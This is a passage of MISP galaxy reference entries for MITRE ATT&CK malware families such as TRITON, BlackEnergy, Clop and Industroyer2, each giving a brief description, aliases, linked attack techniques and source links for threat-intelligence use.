The tag is: misp-galaxy:mitre-malware="BLACKCOFFEE - S0069"

BLACKCOFFEE - S0069 is also known as:

  • BLACKCOFFEE

BLACKCOFFEE - S0069 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 7381. Table References

Links

https://attack.mitre.org/software/S0069

https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html

https://www2.fireeye.com/rs/fireye/images/APT17_Report.pdf

TRITON - S0609

This entry was deprecated as it was inadvertently added to Enterprise; a similar Software entry was created for ATT&CK for ICS.

[TRITON](https://attack.mitre.org/software/S0609) is an attack framework built to interact with Triconex Safety Instrumented System (SIS) controllers. [TRITON](https://attack.mitre.org/software/S0609) was deployed against at least one target in the Middle East. (Citation: FireEye TRITON 2017)(Citation: FireEye TRITON 2018)(Citation: Dragos TRISIS)(Citation: CISA HatMan)(Citation: FireEye TEMP.Veles 2018)

The tag is: misp-galaxy:mitre-malware="TRITON - S0609"

TRITON - S0609 is also known as:

  • TRITON

  • HatMan

  • TRISIS

Table 7382. Table References

Links

https://attack.mitre.org/software/S0609

https://us-cert.cisa.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%20-%20Safety%20System%20Targeted%20Malware%20%28Update%20B%29.pdf

https://www.dragos.com/wp-content/uploads/TRISIS-01.pdf

https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html

https://www.fireeye.com/blog/threat-research/2018/06/totally-tubular-treatise-on-TRITON-and-tristation.html

https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html

CallMe - S0077

[CallMe](https://attack.mitre.org/software/S0077) is a Trojan designed to run on Apple OSX. It is based on a publicly available tool called Tiny SHell. (Citation: Scarlet Mimic Jan 2016)

The tag is: misp-galaxy:mitre-malware="CallMe - S0077"

CallMe - S0077 is also known as:

  • CallMe

CallMe - S0077 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 7383. Table References

Links

http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/

https://attack.mitre.org/software/S0077

Psylo - S0078

[Psylo](https://attack.mitre.org/software/S0078) is a shellcode-based Trojan that has been used by [Scarlet Mimic](https://attack.mitre.org/groups/G0029). It has similar characteristics as [FakeM](https://attack.mitre.org/software/S0076). (Citation: Scarlet Mimic Jan 2016)

The tag is: misp-galaxy:mitre-malware="Psylo - S0078"

Psylo - S0078 is also known as:

  • Psylo

Psylo - S0078 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 7384. Table References

Links

http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/

https://attack.mitre.org/software/S0078

MobileOrder - S0079

[MobileOrder](https://attack.mitre.org/software/S0079) is a Trojan intended to compromise Android mobile devices. It has been used by [Scarlet Mimic](https://attack.mitre.org/groups/G0029). (Citation: Scarlet Mimic Jan 2016)

The tag is: misp-galaxy:mitre-malware="MobileOrder - S0079"

MobileOrder - S0079 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Standard Cryptographic Protocol - T1032" with estimative-language:likelihood-probability="almost-certain"

Table 7385. Table References

Links

http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/

https://attack.mitre.org/software/S0079

Kasidet - S0088

[Kasidet](https://attack.mitre.org/software/S0088) is a backdoor that has been dropped by using malicious VBA macros. (Citation: Zscaler Kasidet)

The tag is: misp-galaxy:mitre-malware="Kasidet - S0088"

Kasidet - S0088 is also known as:

  • Kasidet

Kasidet - S0088 has relationships with:

  • similar: misp-galaxy:malpedia="Neutrino" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Input Capture - T1056" with estimative-language:likelihood-probability="almost-certain"

Table 7386. Table References

Links

http://research.zscaler.com/2016/01/malicious-office-files-dropping-kasidet.html

https://attack.mitre.org/software/S0088

BlackEnergy - S0089

[BlackEnergy](https://attack.mitre.org/software/S0089) is a malware toolkit that has been used by both criminal and APT actors. It dates back to at least 2007 and was originally designed to create botnets for use in conducting Distributed Denial of Service (DDoS) attacks, but its use has evolved to support various plug-ins. It is well known for being used during the confrontation between Georgia and Russia in 2008, as well as in targeting Ukrainian institutions. Variants include BlackEnergy 2 and BlackEnergy 3. (Citation: F-Secure BlackEnergy 2014)

The tag is: misp-galaxy:mitre-malware="BlackEnergy - S0089"

BlackEnergy - S0089 is also known as:

  • BlackEnergy

  • Black Energy

BlackEnergy - S0089 has relationships with:

  • similar: misp-galaxy:tool="BlackEnergy" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="BlackEnergy" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1060" with estimative-language:likelihood-probability="almost-certain"

Table 7387. Table References

Links

https://attack.mitre.org/software/S0089

https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf

H1N1 - S0132

[H1N1](https://attack.mitre.org/software/S0132) is a malware variant that has been distributed via a campaign using VBA macros to infect victims. Although it initially had only loader capabilities, it has evolved to include information-stealing functionality. (Citation: Cisco H1N1 Part 1)

The tag is: misp-galaxy:mitre-malware="H1N1 - S0132"

H1N1 - S0132 is also known as:

  • H1N1

H1N1 - S0132 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 7388. Table References

Links

http://blogs.cisco.com/security/h1n1-technical-analysis-reveals-new-capabilities

https://attack.mitre.org/software/S0132

Tarrask - S1011

[Tarrask](https://attack.mitre.org/software/S1011) is malware that has been used by [HAFNIUM](https://attack.mitre.org/groups/G0125) since at least August 2021. [Tarrask](https://attack.mitre.org/software/S1011) was designed to evade digital defenses and maintain persistence by generating concealed scheduled tasks.(Citation: Tarrask scheduled task)

The tag is: misp-galaxy:mitre-malware="Tarrask - S1011"

Tarrask - S1011 is also known as:

  • Tarrask

Table 7389. Table References

Links

https://attack.mitre.org/software/S1011

https://www.microsoft.com/security/blog/2022/04/12/tarrask-malware-uses-scheduled-tasks-for-defense-evasion/

ROCKBOOT - S0112

[ROCKBOOT](https://attack.mitre.org/software/S0112) is a [Bootkit](https://attack.mitre.org/techniques/T1542/003) that has been used by an unidentified, suspected China-based group. (Citation: FireEye Bootkits)

The tag is: misp-galaxy:mitre-malware="ROCKBOOT - S0112"

ROCKBOOT - S0112 is also known as:

  • ROCKBOOT

ROCKBOOT - S0112 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Bootkit - T1067" with estimative-language:likelihood-probability="almost-certain"

Table 7390. Table References

Links

https://attack.mitre.org/software/S0112

https://www.fireeye.com/blog/threat-research/2015/12/fin1-targets-boot-record.html

DnsSystem - S1021

[DnsSystem](https://attack.mitre.org/software/S1021) is a .NET based DNS backdoor, which is a customized version of the open source tool DIG.net, that has been used by [HEXANE](https://attack.mitre.org/groups/G1001) since at least June 2022.(Citation: Zscaler Lyceum DnsSystem June 2022)

The tag is: misp-galaxy:mitre-malware="DnsSystem - S1021"

DnsSystem - S1021 is also known as:

  • DnsSystem

Table 7391. Table References

Links

https://attack.mitre.org/software/S1021

https://www.zscaler.com/blogs/security-research/lyceum-net-dns-backdoor

PowerLess - S1012

[PowerLess](https://attack.mitre.org/software/S1012) is a PowerShell-based modular backdoor that has been used by [Magic Hound](https://attack.mitre.org/groups/G0059) since at least 2022.(Citation: Cybereason PowerLess February 2022)

The tag is: misp-galaxy:mitre-malware="PowerLess - S1012"

PowerLess - S1012 is also known as:

  • PowerLess

Table 7392. Table References

Links

https://attack.mitre.org/software/S1012

https://www.cybereason.com/blog/research/powerless-trojan-iranian-apt-phosphorus-adds-new-powershell-backdoor-for-espionage

Linfo - S0211

[Linfo](https://attack.mitre.org/software/S0211) is a rootkit trojan used by [Elderwood](https://attack.mitre.org/groups/G0066) to open a backdoor on compromised hosts. (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Linfo May 2012)

The tag is: misp-galaxy:mitre-malware="Linfo - S0211"

Linfo - S0211 is also known as:

  • Linfo

Linfo - S0211 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"

Table 7393. Table References

Links

https://attack.mitre.org/software/S0211

https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf

https://www.symantec.com/security_response/writeup.jsp?docid=2012-051605-2535-99

PS1 - S0613

[PS1](https://attack.mitre.org/software/S0613) is a loader that was used to deploy 64-bit backdoors in the [CostaRicto](https://attack.mitre.org/groups/G0132) campaign.(Citation: BlackBerry CostaRicto November 2020)

The tag is: misp-galaxy:mitre-malware="PS1 - S0613"

PS1 - S0613 is also known as:

  • PS1

Table 7394. Table References

Links

https://attack.mitre.org/software/S0613

https://blogs.blackberry.com/en/2020/11/the-costaricto-campaign-cyber-espionage-outsourced

TINYTYPHON - S0131

[TINYTYPHON](https://attack.mitre.org/software/S0131) is a backdoor that has been used by the actors responsible for the MONSOON campaign. The majority of its code was reportedly taken from the MyDoom worm. (Citation: Forcepoint Monsoon)

The tag is: misp-galaxy:mitre-malware="TINYTYPHON - S0131"

TINYTYPHON - S0131 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

Table 7395. Table References

Links

https://attack.mitre.org/software/S0131

https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf

PingPull - S1031

[PingPull](https://attack.mitre.org/software/S1031) is a remote access Trojan (RAT) written in Visual C++ that has been used by [GALLIUM](https://attack.mitre.org/groups/G0093) since at least June 2022. [PingPull](https://attack.mitre.org/software/S1031) has been used to target telecommunications companies, financial institutions, and government entities in Afghanistan, Australia, Belgium, Cambodia, Malaysia, Mozambique, the Philippines, Russia, and Vietnam.(Citation: Unit 42 PingPull Jun 2022)

The tag is: misp-galaxy:mitre-malware="PingPull - S1031"

PingPull - S1031 is also known as:

  • PingPull

Table 7396. Table References

Links

https://attack.mitre.org/software/S1031

https://unit42.paloaltonetworks.com/pingpull-gallium/

Prikormka - S0113

[Prikormka](https://attack.mitre.org/software/S0113) is a malware family used in a campaign known as Operation Groundbait. It has predominantly been observed in Ukraine and was used as early as 2008. (Citation: ESET Operation Groundbait)

The tag is: misp-galaxy:mitre-malware="Prikormka - S0113"

Prikormka - S0113 is also known as:

  • Prikormka

Prikormka - S0113 has relationships with:

  • similar: misp-galaxy:tool="Prikormka" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

Table 7397. Table References

Links

http://www.welivesecurity.com/wp-content/uploads/2016/05/Operation-Groundbait.pdf

https://attack.mitre.org/software/S0113

YiSpecter - S0311

[YiSpecter](https://attack.mitre.org/software/S0311) is a family of iOS and Android malware, first detected in November 2014, targeting users in mainland China and Taiwan. [YiSpecter](https://attack.mitre.org/software/S0311) abuses private APIs in iOS to infect both jailbroken and non-jailbroken devices.(Citation: paloalto_yispecter_1015)

The tag is: misp-galaxy:mitre-malware="YiSpecter - S0311"

YiSpecter - S0311 is also known as:

  • YiSpecter

YiSpecter - S0311 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Abuse of iOS Enterprise App Signing Key - T1445" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Other Means - T1476" with estimative-language:likelihood-probability="almost-certain"

Table 7398. Table References

Links

https://attack.mitre.org/software/S0311

https://unit42.paloaltonetworks.com/yispecter-first-ios-malware-attacks-non-jailbroken-ios-devices-by-abusing-private-apis/

ZxxZ - S1013

[ZxxZ](https://attack.mitre.org/software/S1013) is a trojan written in Visual C++ that has been used by [BITTER](https://attack.mitre.org/groups/G1002) since at least August 2021, including against Bangladeshi government personnel.(Citation: Cisco Talos Bitter Bangladesh May 2022)

The tag is: misp-galaxy:mitre-malware="ZxxZ - S1013"

Table 7399. Table References

Links

https://attack.mitre.org/software/S1013

https://blog.talosintelligence.com/2022/05/bitter-apt-adds-bangladesh-to-their.html

BOOTRASH - S0114

[BOOTRASH](https://attack.mitre.org/software/S0114) is a [Bootkit](https://attack.mitre.org/techniques/T1542/003) that targets Windows operating systems. It has been used by threat actors that target the financial sector.(Citation: Mandiant M Trends 2016)(Citation: FireEye Bootkits)(Citation: FireEye BOOTRASH SANS)

The tag is: misp-galaxy:mitre-malware="BOOTRASH - S0114"

BOOTRASH - S0114 is also known as:

  • BOOTRASH

BOOTRASH - S0114 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Bootkit - T1067" with estimative-language:likelihood-probability="almost-certain"

Table 7400. Table References

Links

https://attack.mitre.org/software/S0114

https://www.fireeye.com/blog/threat-research/2015/12/fin1-targets-boot-record.html

https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdf

https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1498163766.pdf

DanBot - S1014

[DanBot](https://attack.mitre.org/software/S1014) is a first-stage remote access Trojan written in C# that has been used by [HEXANE](https://attack.mitre.org/groups/G1001) since at least 2018.(Citation: SecureWorks August 2019)

The tag is: misp-galaxy:mitre-malware="DanBot - S1014"

DanBot - S1014 is also known as:

  • DanBot

Table 7401. Table References

Links

https://attack.mitre.org/software/S1014

https://www.secureworks.com/blog/lyceum-takes-center-stage-in-middle-east-campaign

Chinoxy - S1041

[Chinoxy](https://attack.mitre.org/software/S1041) is a backdoor that has been used since at least November 2018, during the [FunnyDream](https://attack.mitre.org/campaigns/C0007) campaign, to gain persistence and drop additional payloads. According to security researchers, [Chinoxy](https://attack.mitre.org/software/S1041) has been used by Chinese-speaking threat actors.(Citation: Bitdefender FunnyDream Campaign November 2020)

The tag is: misp-galaxy:mitre-malware="Chinoxy - S1041"

Chinoxy - S1041 is also known as:

  • Chinoxy

Table 7402. Table References

Links

https://attack.mitre.org/software/S1041

https://www.bitdefender.com/files/News/CaseStudies/study/379/Bitdefender-Whitepaper-Chinese-APT.pdf

Rotexy - S0411

[Rotexy](https://attack.mitre.org/software/S0411) is an Android banking malware that has evolved over several years. It was originally an SMS spyware Trojan first spotted in October 2014, and since then has evolved to contain more features, including ransomware functionality.(Citation: securelist rotexy 2018)

The tag is: misp-galaxy:mitre-malware="Rotexy - S0411"

Rotexy - S0411 is also known as:

  • Rotexy

Table 7403. Table References

Links

https://attack.mitre.org/software/S0411

https://securelist.com/the-rotexy-mobile-trojan-banker-and-ransomware/88893/

HALFBAKED - S0151

[HALFBAKED](https://attack.mitre.org/software/S0151) is a malware family consisting of multiple components intended to establish persistence in victim networks. (Citation: FireEye FIN7 April 2017)

The tag is: misp-galaxy:mitre-malware="HALFBAKED - S0151"

HALFBAKED - S0151 has relationships with:

  • similar: misp-galaxy:tool="VB Flash" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

Table 7404. Table References

Links

https://attack.mitre.org/software/S0151

https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html

Crimson - S0115

[Crimson](https://attack.mitre.org/software/S0115) is a remote access Trojan that has been used by [Transparent Tribe](https://attack.mitre.org/groups/G0134) since at least 2016.(Citation: Proofpoint Operation Transparent Tribe March 2016)(Citation: Kaspersky Transparent Tribe August 2020)

The tag is: misp-galaxy:mitre-malware="Crimson - S0115"

Crimson - S0115 is also known as:

  • Crimson

  • MSIL/Crimson

Crimson - S0115 has relationships with:

  • similar: misp-galaxy:tool="Crimson" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:rat="Crimson" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Crimson RAT" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

Table 7405. Table References

Links

https://attack.mitre.org/software/S0115

https://securelist.com/transparent-tribe-part-1/98127/

https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf

RegDuke - S0511

[RegDuke](https://attack.mitre.org/software/S0511) is a first stage implant written in .NET and used by [APT29](https://attack.mitre.org/groups/G0016) since at least 2017. [RegDuke](https://attack.mitre.org/software/S0511) has been used to control a compromised machine when control of other implants on the machine was lost.(Citation: ESET Dukes October 2019)

The tag is: misp-galaxy:mitre-malware="RegDuke - S0511"

RegDuke - S0511 is also known as:

  • RegDuke

Table 7406. Table References

Links

https://attack.mitre.org/software/S0511

https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf

KEYPLUG - S1051

[KEYPLUG](https://attack.mitre.org/software/S1051) is a modular backdoor written in C++, with Windows and Linux variants, that has been used by [APT41](https://attack.mitre.org/groups/G0096) since at least June 2021.(Citation: Mandiant APT41)

The tag is: misp-galaxy:mitre-malware="KEYPLUG - S1051"

KEYPLUG - S1051 is also known as:

  • KEYPLUG

  • KEYPLUG.LINUX

Table 7407. Table References

Links

https://attack.mitre.org/software/S1051

https://www.mandiant.com/resources/apt41-us-state-governments

Milan - S1015

[Milan](https://attack.mitre.org/software/S1015) is a backdoor implant based on [DanBot](https://attack.mitre.org/software/S1014) that was written in Visual C++ and .NET. [Milan](https://attack.mitre.org/software/S1015) has been used by [HEXANE](https://attack.mitre.org/groups/G1001) since at least June 2020.(Citation: ClearSky Siamesekitten August 2021)(Citation: Kaspersky Lyceum October 2021)

The tag is: misp-galaxy:mitre-malware="Milan - S1015"

Milan - S1015 is also known as:

  • Milan

  • James

Table 7408. Table References

Links

https://attack.mitre.org/software/S1015

https://vblocalhost.com/uploads/VB2021-Kayal-etal.pdf

https://www.accenture.com/us-en/blogs/cyber-defense/iran-based-lyceum-campaigns

https://www.clearskysec.com/siamesekitten/

AbstractEmu - S1061

[AbstractEmu](https://attack.mitre.org/software/S1061) is mobile malware that was first seen in Google Play and other third-party stores in October 2021. It was discovered in 19 Android applications, of which at least 7 abused known Android exploits for obtaining root permissions. [AbstractEmu](https://attack.mitre.org/software/S1061) was observed primarily impacting users in the United States; however, victims are believed to be spread across a total of 17 countries.(Citation: lookout_abstractemu_1021)

The tag is: misp-galaxy:mitre-malware="AbstractEmu - S1061"

AbstractEmu - S1061 is also known as:

  • AbstractEmu

Table 7409. Table References

Links

https://attack.mitre.org/software/S1061

https://www.lookout.com/blog/lookout-discovers-global-rooting-malware-campaign

XAgentOSX - S0161

[XAgentOSX](https://attack.mitre.org/software/S0161) is a trojan that has been used by [APT28](https://attack.mitre.org/groups/G0007) on OS X and appears to be a port of their standard [CHOPSTICK](https://attack.mitre.org/software/S0023) or XAgent trojan. (Citation: XAgentOSX 2017)

The tag is: misp-galaxy:mitre-malware="XAgentOSX - S0161"

XAgentOSX - S0161 is also known as:

  • XAgentOSX

  • OSX.Sofacy

XAgentOSX - S0161 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

Table 7410. Table References

Links

https://attack.mitre.org/software/S0161

https://researchcenter.paloaltonetworks.com/2017/02/unit42-xagentosx-sofacys-xagent-macos-tool/

https://www.symantec.com/blogs/election-security/apt28-espionage-military-government

Clop - S0611

[Clop](https://attack.mitre.org/software/S0611) is a ransomware family that was first observed in February 2019 and has been used against retail, transportation and logistics, education, manufacturing, engineering, automotive, energy, financial, aerospace, telecommunications, professional and legal services, healthcare, and high tech industries. [Clop](https://attack.mitre.org/software/S0611) is a variant of the CryptoMix ransomware.(Citation: Mcafee Clop Aug 2019)(Citation: Cybereason Clop Dec 2020)(Citation: Unit42 Clop April 2021)

The tag is: misp-galaxy:mitre-malware="Clop - S0611"

Clop - S0611 is also known as:

  • Clop

Table 7411. Table References

Links

https://attack.mitre.org/software/S0611

https://unit42.paloaltonetworks.com/clop-ransomware/

https://www.cybereason.com/blog/cybereason-vs.-clop-ransomware

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/clop-ransomware/

MacMa - S1016

[MacMa](https://attack.mitre.org/software/S1016) is a macOS-based backdoor with a large set of functionalities to control and exfiltrate files from a compromised computer. [MacMa](https://attack.mitre.org/software/S1016) has been observed in the wild since November 2021.(Citation: ESET DazzleSpy Jan 2022)

The tag is: misp-galaxy:mitre-malware="MacMa - S1016"

MacMa - S1016 is also known as:

  • MacMa

  • OSX.CDDS

  • DazzleSpy

Table 7412. Table References

Links

https://attack.mitre.org/software/S1016

https://objective-see.org/blog/blog_0x69.html

https://www.welivesecurity.com/2022/01/25/watering-hole-deploys-new-macos-malware-dazzlespy-asia/

Felismus - S0171

[Felismus](https://attack.mitre.org/software/S0171) is a modular backdoor that has been used by [Sowbug](https://attack.mitre.org/groups/G0054). (Citation: Symantec Sowbug Nov 2017) (Citation: Forcepoint Felismus Mar 2017)

The tag is: misp-galaxy:mitre-malware="Felismus - S0171"

Felismus - S0171 is also known as:

  • Felismus

Felismus - S0171 has relationships with:

  • similar: misp-galaxy:malpedia="Felismus" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Application Layer Protocol - T1071" with estimative-language:likelihood-probability="almost-certain"

Table 7413. Table References

Links

https://attack.mitre.org/software/S0171

https://blogs.forcepoint.com/security-labs/playing-cat-mouse-introducing-felismus-malware

https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments

OutSteel - S1017

[OutSteel](https://attack.mitre.org/software/S1017) is a file uploader and document stealer developed with the scripting language AutoIT that has been used by [Ember Bear](https://attack.mitre.org/groups/G1003) since at least March 2021.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022)

The tag is: misp-galaxy:mitre-malware="OutSteel - S1017"

Table 7414. Table References

Links

https://attack.mitre.org/software/S1017

https://unit42.paloaltonetworks.com/ukraine-targeted-outsteel-saintbot/

XTunnel - S0117

[XTunnel](https://attack.mitre.org/software/S0117) is a VPN-like network proxy tool that can relay traffic between a C2 server and a victim. It was first seen in May 2013 and reportedly used by [APT28](https://attack.mitre.org/groups/G0007) during the compromise of the Democratic National Committee. (Citation: Crowdstrike DNC June 2016) (Citation: Invincea XTunnel) (Citation: ESET Sednit Part 2)

The tag is: misp-galaxy:mitre-malware="XTunnel - S0117"

XTunnel - S0117 is also known as:

  • XTunnel

  • Trojan.Shunnael

  • X-Tunnel

  • XAPS

XTunnel - S0117 has relationships with:

  • similar: misp-galaxy:malpedia="XTunnel" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="X-Tunnel" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"

Table 7415. Table References

Links

http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf

https://attack.mitre.org/software/S0117

https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/

https://www.invincea.com/2016/07/tunnel-of-gov-dnc-hack-and-the-russian-xtunnel/

https://www.symantec.com/blogs/election-security/apt28-espionage-military-government

BADHATCH - S1081

[BADHATCH](https://attack.mitre.org/software/S1081) is a backdoor that has been utilized by [FIN8](https://attack.mitre.org/groups/G0061) since at least 2019. [BADHATCH](https://attack.mitre.org/software/S1081) has been used to target the insurance, retail, technology, and chemical industries in the United States, Canada, South Africa, Panama, and Italy.(Citation: Gigamon BADHATCH Jul 2019)(Citation: BitDefender BADHATCH Mar 2021)

The tag is: misp-galaxy:mitre-malware="BADHATCH - S1081"

BADHATCH - S1081 is also known as:

  • BADHATCH

Table 7416. Table References

Links

https://attack.mitre.org/software/S1081

https://blog.gigamon.com/2019/07/23/abadbabe-8badf00d-discovering-badhatch-and-a-detailed-look-at-fin8s-tooling/

https://www.bitdefender.com/files/News/CaseStudies/study/394/Bitdefender-PR-Whitepaper-BADHATCH-creat5237-en-EN.pdf

FALLCHILL - S0181

[FALLCHILL](https://attack.mitre.org/software/S0181) is a RAT that has been used by [Lazarus Group](https://attack.mitre.org/groups/G0032) since at least 2016 to target the aerospace, telecommunications, and finance industries. It is usually dropped by other [Lazarus Group](https://attack.mitre.org/groups/G0032) malware or delivered when a victim unknowingly visits a compromised website. (Citation: US-CERT FALLCHILL Nov 2017)

The tag is: misp-galaxy:mitre-malware="FALLCHILL - S0181"

FALLCHILL - S0181 is also known as:

  • FALLCHILL

FALLCHILL - S0181 has relationships with:

  • similar: misp-galaxy:tool="Volgmer" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Volgmer" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:rat="FALLCHILL" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

Table 7417. Table References

Links

https://attack.mitre.org/software/S0181

https://www.us-cert.gov/ncas/alerts/TA17-318A

Nidiran - S0118

[Nidiran](https://attack.mitre.org/software/S0118) is a custom backdoor developed and used by [Suckfly](https://attack.mitre.org/groups/G0039). It has been delivered via strategic web compromise. (Citation: Symantec Suckfly March 2016)

The tag is: misp-galaxy:mitre-malware="Nidiran - S0118"

Nidiran - S0118 is also known as:

  • Nidiran

  • Backdoor.Nidiran

Nidiran - S0118 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Standard Cryptographic Protocol - T1032" with estimative-language:likelihood-probability="almost-certain"

Table 7418. Table References

Links

http://www.symantec.com/connect/blogs/suckfly-revealing-secret-life-your-code-signing-certificates

https://attack.mitre.org/software/S0118

Shark - S1019

[Shark](https://attack.mitre.org/software/S1019) is a backdoor malware written in C# and .NET that is an updated version of [Milan](https://attack.mitre.org/software/S1015); it has been used by [HEXANE](https://attack.mitre.org/groups/G1001) since at least July 2021.(Citation: ClearSky Siamesekitten August 2021)(Citation: Accenture Lyceum Targets November 2021)

The tag is: misp-galaxy:mitre-malware="Shark - S1019"

Shark - S1019 is also known as:

  • Shark

Table 7419. Table References

Links

https://attack.mitre.org/software/S1019

https://www.accenture.com/us-en/blogs/cyber-defense/iran-based-lyceum-campaigns

https://www.clearskysec.com/siamesekitten/

Concipit1248 - S0426

[Concipit1248](https://attack.mitre.org/software/S0426) is iOS spyware that was discovered using the same name as the developer of the Android spyware [Corona Updates](https://attack.mitre.org/software/S0425). Further investigation revealed that the two pieces of software contained the same C2 URL and similar functionality.(Citation: TrendMicro Coronavirus Updates)

The tag is: misp-galaxy:mitre-malware="Concipit1248 - S0426"

Concipit1248 - S0426 is also known as:

  • Concipit1248

  • Corona Updates

Table 7420. Table References

Links

https://attack.mitre.org/software/S0426

https://blog.trendmicro.com/trendlabs-security-intelligence/coronavirus-update-app-leads-to-project-spy-android-and-ios-spyware/

Industroyer2 - S1072

[Industroyer2](https://attack.mitre.org/software/S1072) is a compiled and static piece of malware that has the ability to communicate over the IEC-104 protocol. It is similar to the IEC-104 module found in [Industroyer](https://attack.mitre.org/software/S0604). Security researchers assess that [Industroyer2](https://attack.mitre.org/software/S1072) was designed to cause impact to high-voltage electrical substations. The initial [Industroyer2](https://attack.mitre.org/software/S1072) sample was compiled on 03/23/2022 and scheduled to execute on 04/08/2022; however, it was discovered before deployment, resulting in no impact.(Citation: Industroyer2 Blackhat ESET)

The tag is: misp-galaxy:mitre-malware="Industroyer2 - S1072"

Industroyer2 - S1072 is also known as:

  • Industroyer2

Table 7421. Table References

Links

https://attack.mitre.org/software/S1072

https://www.youtube.com/watch?v=xC9iM5wVedQ

CORALDECK - S0212

[CORALDECK](https://attack.mitre.org/software/S0212) is an exfiltration tool used by [APT37](https://attack.mitre.org/groups/G0067). (Citation: FireEye APT37 Feb 2018)

The tag is: misp-galaxy:mitre-malware="CORALDECK - S0212"

CORALDECK - S0212 is also known as:

  • CORALDECK

CORALDECK - S0212 has relationships with:

  • similar: misp-galaxy:tool="CORALDECK" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Data Compressed - T1002" with estimative-language:likelihood-probability="almost-certain"

Table 7422. Table References

Links

https://attack.mitre.org/software/S0212

https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf

IceApple - S1022

[IceApple](https://attack.mitre.org/software/S1022) is a modular Internet Information Services (IIS) post-exploitation framework that has been used since at least 2021 against the technology, academic, and government sectors.(Citation: CrowdStrike IceApple May 2022)

The tag is: misp-galaxy:mitre-malware="IceApple - S1022"

IceApple - S1022 is also known as:

  • IceApple

Table 7423. Table References

Links

https://attack.mitre.org/software/S1022

https://www.crowdstrike.com/wp-content/uploads/2022/05/crowdstrike-iceapple-a-novel-internet-information-services-post-exploitation-framework.pdf

Umbreon - S0221

A Linux rootkit that provides backdoor access and hides from defenders.

The tag is: misp-galaxy:mitre-malware="Umbreon - S0221"

Umbreon - S0221 is also known as:

  • Umbreon

Umbreon - S0221 has relationships with:

  • similar: misp-galaxy:tool="Umbreon" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Umbreon" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Rootkit - T1014" with estimative-language:likelihood-probability="almost-certain"

Table 7424. Table References

Links

https://attack.mitre.org/software/S0221

